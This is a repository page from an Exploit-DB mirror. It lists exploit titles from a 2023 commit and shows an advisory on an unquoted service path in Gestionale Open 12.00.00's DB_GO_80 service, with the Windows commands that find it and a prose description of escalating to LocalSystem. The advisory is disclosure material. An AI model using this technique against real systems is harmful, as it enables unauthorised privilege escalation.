bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/51065.txt
Exploit-DB b137003172 DB: 2023-03-28 
36 changes to exploits/shellcodes/ghdb

MiniDVBLinux 5.4  - Change Root Password
MiniDVBLinux 5.4  - Remote Root Command Injection
MiniDVBLinux 5.4 - Arbitrary File Read
MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure
MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)
MiniDVBLinux <=5.4  - Config Download Exploit

Desktop Central 9.1.0 - Multiple Vulnerabilities

FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass
Aero CMS v0.0.1 - PHP Code Injection (auth)
Aero CMS v0.0.1 - SQL Injection (no auth)

Atom CMS v2.0 - SQL Injection (no auth)
Canteen-Management v1.0 - SQL Injection
Canteen-Management v1.0 - XSS-Reflected

Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)

FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)

Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
WebTareas 2.4 - RCE (Authorized)
WebTareas 2.4 - Reflected XSS (Unauthorised)
WebTareas 2.4 - SQL Injection (Unauthorised)

WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities

Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)

Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass

Grafana <=6.2.4 - HTML Injection

Hex Workshop v6.7 - Buffer overflow DoS

Scdbg 1.0 - Buffer overflow DoS

Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)

AVS Audio Converter 10.3 - Stack Overflow (SEH)

Explorer32++ v1.3.5.531 - Buffer overflow

Frhed (Free hex editor) v1.6.0 - Buffer overflow

Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path

Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path

Resource Hacker v3.6.0.92 - Buffer overflow

Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path

WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
2023-03-28 00:16:27 +00:00

35 lines
No EOL
1.5 KiB
Text
Raw Blame History

# Exploit Title: Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path
# Exploit by: Luis Martinez
# Discovery Date: 2022-10-05
# Vendor Homepage: https://www.gestionaleopen.org/
# Software Link : https://www.gestionaleopen.org/download/
# Tested Version: 12.00.00
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DB_GO_80" | findstr /i /v """
DB_GO_80 DB_GO_80 C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80 Auto
# Service info:
C:\>sc qc "DB_GO_80"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DB_GO_80
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DB_GO_80
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Reference in a new issue View git blame Copy permalink